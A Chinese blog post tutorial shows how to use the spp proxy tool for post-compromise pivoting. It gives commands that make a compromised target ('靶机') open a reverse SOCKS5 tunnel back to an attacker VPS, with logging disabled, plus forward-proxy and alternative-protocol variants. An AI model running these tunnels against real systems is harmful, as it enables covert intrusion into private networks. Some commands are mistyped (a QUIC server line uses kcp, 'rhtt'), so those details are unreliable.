原创 FengXS0ne Feng随心而安
微信号 gh_13bd5fd7a612
功能介绍 一个平凡的人,记录平凡的事,过着平凡的生活。平平淡淡,简简单单,追求无憾,追求无悔。
__发表于
收录于合集 #内网穿透学习 9个
本文章仅供学习交流使用, 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。请尊重原创,可以相互学习,虽说是记录生活,但也反感被人拿去盈利。
1. 工具介绍
** **一款比较好用的内网穿透工具,支持的协议:TCP,UDP,RUDP(可靠UDP),RICMP(可靠ICMP),RHTTP(可靠HTTP),KCP,Quic。支持类型:正向代理、反向代理、SOCKS5正向代理、SOCKS5反向代理,协议和类型可以自由组合,外部代理协议和内部转发协议可以自由组合,支持Shadowsocks插件,spp Shadowsocks插件、spp shaowsocks插件android。
下载地址:https://github.com/esrrhs/spp
双工工具,可用做客户端,又可以做服务端
2. 具体使用
** 1. **反向代理
靶机反连到VPS上的1080端口上,通过本地代理VPS的1080端口实现内网穿透到靶机上。
靶机:x.x.x.218
VPS:x.x.x.90
VPS端:./spp -type server -proto tcp -listen :8888 -nolog 1
-type type server 服务端 proxy_client reverse_proxy_client socks5_client 正向代理socks5 reverse_socks5_client 反向socks5代理-proto 使用的协议 tcp rudp ricmp kcp quic rhttp
-listen 监听端口 :8888-nolog 1 不写日志-noprint 1 不在页面打印
靶机(拿到shell)./spp -name "test" -type reverse_socks5_client -server x.x.x.90:8888 -fromaddr :1080 -proxyproto tcp -nolog 1
-name 客户端的名词,默认位client-type reverse_socks5_client 反向sock5代理 -server x.x.x.90:8888 spp的服务端ip以及监听的端口 -fromaddr -fromaddr 反弹socks5到 x.x.x.90 的1080的端口 :1080 -proxyproto tcp 被代理的协议-nolog 1 不写日志-noprint 1 不在页面打印
当靶机反连过去,VPS的1080端口就会被打开。
**2. **正向代理
本地去socks5 vps 的1080 端口,后通过本地代理VPS的1080端口实现内网穿透到靶机上。VPS的1080端口直连到靶机上去,
靶机:x.x.x.218
VPS:x.x.x.90
靶机上:因为是双工工具,可用做客户端,又可以做服务端
靶机上./spp -type server -proto tcp -listen :8821-type type server 服务端
VPS: ./spp -name "test" -type socks5_client -server x.x.x.218:8821 -fromaddr :1080 -proxyproto tcp
-name 客户端的名词,默认位client-type socks5_client 正向sock5代理 -server x.x.x.218:8821 spp的服务端ip以及监听的端口 -fromaddr -fromaddr 正向代理,打开的是VPS的1080端口 VPS的1080 :1080 -proxyproto tcp 被代理的协议-nolog 1 不写日志-noprint 1 不在页面打印
** **3. 其他
以反向代理为例,使用其他协议
代理TCP,内部RUDP协议转发vps./spp -type server -proto rudp -listen :8888 -nolog 1
靶机shell./spp -name "test" -type reverse_socks5_client -server x.x.x.90:8888 -fromaddr :1080 -toaddr :1080 -proxyproto tcp -proto rudp这里需要注意的参数是-proxyproto tcp -proto rudp 简单理解意思是,对rudp协议封装成tcp协议。这个协议封装是怎样的,我也拿不准,可能说的有错。勿怪
代理TCP,内部kcp协议转发vps./spp -type server -proto kcp -listen :8888 -nolog 1
靶机shell./spp -name "test" -type reverse_socks5_client -server x.x.x.90:8888 -fromaddr :1080 -toaddr :1080 -proxyproto tcp -proto kcp这里需要注意的参数是-proxyproto tcp -proto rudp 简单理解意思是,对kcp协议封装成tcp协议。 这个协议封装是怎样的,我也拿不准,可能说的有错。勿怪
代理TCP,内部quic协议转发vps./spp -type server -proto kcp -listen :8888 -nolog 1
靶机shell./spp -name "test" -type reverse_socks5_client -server x.x.x.90:8888 -fromaddr :1080 -toaddr :1080 -proxyproto tcp -proto quic
代理TCP,内部rhttp协议转发vps./spp -type server -proto rhttp-listen :8888 -nolog 1
靶机shell./spp -name "test" -type reverse_socks5_client -server x.x.x.90:8888 -fromaddr :1080 -toaddr :1080 -proxyproto tcp -proto rhtt
随时记录,用的时候,拿来就用....
内网穿透应该算差不多了吧,魔改的话,等后面再弄吧....最近在研究nuclei这款工具...
** 本文章仅供学习交流使用, 文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担。请尊重原创,可以相互学习,虽说是记录生活,但也反感被人拿去盈利。**
预览时标签不可点
微信扫一扫
关注该公众号
知道了
微信扫一扫
使用小程序
取消 允许
取消 允许
: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看